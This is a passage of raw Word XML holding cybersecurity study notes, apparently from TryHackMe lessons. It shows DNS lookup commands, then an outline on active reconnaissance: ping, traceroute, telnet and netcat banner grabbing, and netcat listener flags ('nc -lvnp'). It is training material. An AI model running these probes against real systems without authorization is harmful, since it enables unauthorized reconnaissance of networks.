          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D8BD172" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nslookup -type=MX tryhackme.com 1.1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="2E344F4A" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0333A7E4" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Lookup DNS TXT records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FBC8482" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nslookup -type=TXT tryhackme.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="59C05816" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D28F31" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Lookup DNS A records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53CC2550" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>dig tryhackme.com A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="2EE3C6E9" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43001EA8" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Lookup DNS MX records at DNS server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A4E4A0" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>dig @1.1.1.1 tryhackme.com MX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A5611" w:rsidRPr="004A5611" w14:paraId="728ADF50" w14:textId="77777777" w:rsidTr="004A5611">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7352AAFD" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Lookup DNS TXT records</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45769DA7" w14:textId="77777777" w:rsidR="004A5611" w:rsidRPr="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A5611">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>dig tryhackme.com TXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15510CD7" w14:textId="05CD208E" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2966A0AF" w14:textId="612F1CC8" w:rsidR="004A5611" w:rsidRDefault="004A5611" w:rsidP="004A5611">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30039690" w14:textId="5B15CAB2" w:rsidR="004A5611" w:rsidRDefault="007F1422" w:rsidP="004A5611">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Active Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119828E1" w14:textId="75C63892" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50754262" w14:textId="42EB2706" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web browser tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5244E506" w14:textId="0463FABF" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EFF60" w14:textId="26FCC381" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF6D8D" w14:textId="570C0B39" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04177263" w14:textId="68A9362A" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FDA7A" w14:textId="7C983B64" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B5DAA" w14:textId="29F9BE9A" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D11D031" w14:textId="674CA3AB" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>FoxyProxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022FC68B" w14:textId="71E601C9" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent Switcher and Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF6B24" w14:textId="15B933C2" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wappalyzer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D034D53" w14:textId="388379EE" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E960A7" w14:textId="2DFC4DD5" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ICMP Echo Packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342AC89" w14:textId="2C8D9AD9" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ICMP Echo/type 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A3552" w14:textId="4297111B" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ICMP Echo reply/type 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC991D" w14:textId="4F369B69" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Confirm target is online before follow-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF4F3F7" w14:textId="4743C432" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Need to specify count on linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA8B2F" w14:textId="250E4D64" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BBC188" w14:textId="0DAE62D5" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When no reply is received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76124A76" w14:textId="35563885" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unresponsive destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C30B07" w14:textId="4A511F87" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unplugged from network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25334D2B" w14:textId="5022E928" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Firewall blockage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66577E7E" w14:textId="47A192D7" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B1F2B" w14:textId="42A85780" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Find IP addresses of the routers or hops that a packet traverses as it goes from system to target host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F319F71" w14:textId="64F56742" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Use small TTL to trick routers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35874BCF" w14:textId="71B33189" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Linux starts with UDP and TTL of 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02804697" w14:textId="1C69DB07" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Packets will not always follow same route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24044FD8" w14:textId="6072BF37" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Some routers will return a public IP address and others will not reply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1E8323" w14:textId="0C23091A" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3720D60E" w14:textId="70207C27" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Can connect to any service and grab its banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2947D503" w14:textId="08CA019E" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Grab information about web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ACC3B8" w14:textId="355AE913" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>telnet IP PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC43A8" w14:textId="086F7C61" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38033ADA" w14:textId="792E2FA3" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Host: telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE66E0E" w14:textId="06C654B4" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Double ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52460B0D" w14:textId="274A7E02" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0D3FD" w14:textId="18251CA8" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Listener/server functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C90E01" w14:textId="09AFD468" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Collect banner via</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39744E62" w14:textId="342698C2" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nc IP PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BF0898" w14:textId="01AC422E" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Shift + enter after GET line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48738872" w14:textId="3DDF2731" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF4603" w14:textId="3EEE034D" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Host: netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C016E73" w14:textId="69F35A10" w:rsidR="007F1422" w:rsidRDefault="007F1422" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Nc -lvnp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2FF5D" w14:textId="1F5CADD3" w:rsidR="007F1422" w:rsidRDefault="009B49CA" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-vv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185346B" w14:textId="58A2B463" w:rsidR="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="007F1422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF1D64" w14:textId="43005BAF" w:rsidR="009B49CA" w:rsidRDefault="009B49CA" w:rsidP="009B49CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
